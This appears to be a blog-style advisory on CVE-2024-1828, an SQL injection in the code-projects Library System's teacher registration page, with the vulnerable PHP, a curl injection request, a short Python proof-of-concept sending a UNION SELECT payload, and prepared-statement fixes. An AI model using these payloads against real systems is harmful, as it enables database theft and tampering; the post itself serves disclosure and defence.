A critical security bug has been discovered in the code-projects Library System version 1., tracked as CVE-2024-1828 (also referenced as VDB-254616). This vulnerability allows a remote attacker to perform SQL Injection, making your database open to tampering or theft. In this post, we’ll look at what causes this vulnerability, show you real-world code snippets, share references, walk you through an example exploit, and – most importantly – explain how you can defend your system.

What is code-projects Library System?

code-projects Library System is a free open-source PHP application used by schools and institutions for managing books, users, and borrowing activities. It's commonly downloaded by students and developers for learning or even real-world usage.

Vulnerability Overview

- Vulnerability ID: CVE-2024-1828 / VDB-254616
- Affected Product: code-projects Library System 1.
- Vulnerable File: Source/librarian/user/teacher/registration.php
- Vulnerability Type: SQL Injection (SQLi)
- Impact: Full database read/write, potential information theft, or remote code execution

The problem: The registration.php file takes user input (like email, id number, phone, and username) and puts it straight into an SQL query, without proper filtering.

Where is the Bug?

Let’s look at how these vulnerable parameters are handled in the registration.php file. Here’s a simplified code snippet based on the reported issue:

<?php
// $conn is the application's existing mysqli connection.
$email = $_POST['email'];
$idno = $_POST['idno'];
$phone = $_POST['phone'];
$username = $_POST['username'];

// The four POST values are interpolated directly into the SQL text: this is the injection point.
$sql = "INSERT INTO teachers (email, idno, phone, username) VALUES ('$email', '$idno', '$phone', '$username')";
mysqli_query($conn, $sql);

Let’s say an attacker wants to leak the database contents. They can send a POST request like this:

curl -X POST http://target-site/Source/librarian/user/teacher/registration.php \
 -d "email=attacker@example.com' OR 1=1; -- -" \
 -d "idno=12345" \
 -d "phone=555-5555" \
 -d "username=hacker"

In this example, the injected email value

> attacker@example.com' OR 1=1; -- -

will make the final SQL query look like this:

INSERT INTO teachers (email, idno, phone, username)
VALUES ('attacker@example.com' OR 1=1; -- -', '12345', '555-5555', 'hacker')

The OR 1=1 part always evaluates as true. The -- - sequence comments out the rest of the line, so the query may not even need well-formed values for the other columns.

Consequences:

- The attacker can bypass checks, create accounts at will, or further extract data.
- With more sophisticated payloads, they may be able to exfiltrate data, change passwords, or even access the server if the database user has high privileges.

Here’s a minimal PoC that automates the attack:

import requests

# Target URL from the advisory's vulnerable file path (target-site is a placeholder host).
url = 'http://target-site/Source/librarian/user/teacher/registration.php'
data = {
    'email': "someone@example.com' UNION SELECT @@version,1,2,3; -- ",
    'idno': '2222',
    'phone': '3333',
    'username': 'testuser'
}
# Submit the registration form and print the server's response body.
r = requests.post(url, data=data)
print(r.text)

Best Practice: Use Prepared Statements! For example:

// $conn is a mysqli connection object. The "?" placeholders keep user input out of the SQL text;
// "ssss" binds all four values as strings, so a quote inside them is stored as data, never parsed as SQL.
$stmt = $conn->prepare("INSERT INTO teachers (email, idno, phone, username) VALUES (?, ?, ?, ?)");
$stmt->bind_param("ssss", $email, $idno, $phone, $username);
$stmt->execute();
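To show why binding fixes the bug, here is an added example (not code from the post or from the Library System) that replays the post's email payload against an in-memory SQLite stand-in for the teachers table, once with the interpolated query that mirrors registration.php and once with a parameterised, validated version; the table, the validation patterns and the payload value are all constructed for this demonstration.

```python
import re
import sqlite3

# Constructed payload, copied from the post's curl example.
INJECTED_EMAIL = "attacker@example.com' OR 1=1; -- -"

# Loose but useful shape checks for the four registration fields (assumed, not from the app).
EMAIL_RE = re.compile(r"^[^@\s']+@[^@\s']+\.[A-Za-z]{2,}$")
PHONE_RE = re.compile(r"[0-9+\- ]{4,20}")
USERNAME_RE = re.compile(r"[A-Za-z0-9_.]{3,32}")

def new_db():
    """In-memory stand-in for the Library System's teachers table (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE teachers (email TEXT, idno TEXT, phone TEXT, username TEXT)")
    return conn

def register_unsafe(conn, email, idno, phone, username):
    """Mirrors registration.php: the values are spliced straight into the SQL text."""
    sql = (f"INSERT INTO teachers (email, idno, phone, username) "
           f"VALUES ('{email}', '{idno}', '{phone}', '{username}')")
    try:
        conn.execute(sql)
        return "ok"
    except sqlite3.Error as exc:
        # The quote in the payload closed the string literal early and changed the
        # statement's structure, so the database refuses to parse it.
        return f"error: {exc}"

def register_safe(conn, email, idno, phone, username, validate=True):
    """Hardened form: optional shape validation, then parameter binding.
    The '?' placeholders play the role of mysqli's bind_param in the PHP fix."""
    if validate:
        if not EMAIL_RE.match(email):
            return "rejected: email"
        if not idno.isdigit():
            return "rejected: idno"
        if not PHONE_RE.fullmatch(phone):
            return "rejected: phone"
        if not USERNAME_RE.fullmatch(username):
            return "rejected: username"
    conn.execute(
        "INSERT INTO teachers (email, idno, phone, username) VALUES (?, ?, ?, ?)",
        (email, idno, phone, username),
    )
    return "ok"

def stored_emails(conn):
    """Return the email column so a caller can see what actually reached the table."""
    return [row[0] for row in conn.execute("SELECT email FROM teachers")]
```

With validation off, the bound version still stores the payload as a harmless literal string; with it on, the malformed email is rejected before any query runs, which is the defence-in-depth layer on top of prepared statements.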

References & Further Reading

- Vulnerability detail at VulDB: VDB-254616
- CVE entry at cve.mitre.org
- Original application source and downloads
- OWASP SQL Injection Prevention Cheat Sheet

Conclusion

CVE-2024-1828 is a classic example of why proper input validation and prepared statements are so important. If you’re using code-projects Library System 1., make sure to patch your code right away. This SQL Injection flaw is easy to exploit and has already been publicly disclosed. Don’t let your information fall into the wrong hands.

If you learned something, share this post with your friends, teams, or students using this library. Stay safe!


*This analysis is exclusive and written in simple terms for anyone to understand. Feel free to reference the official VulDB advisory or the CVE page for more technical detail.*

Timeline

Published on: 02/23/2024 18:15:50 UTC
Last modified on: 03/21/2024 02:51:46 UTC